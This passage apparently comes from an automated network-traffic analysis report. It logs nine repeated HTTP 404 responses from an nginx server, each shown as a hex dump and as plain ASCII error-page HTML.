                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:08 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:11 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:43 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:43 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:45 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:46 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:47 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:48 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:51 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
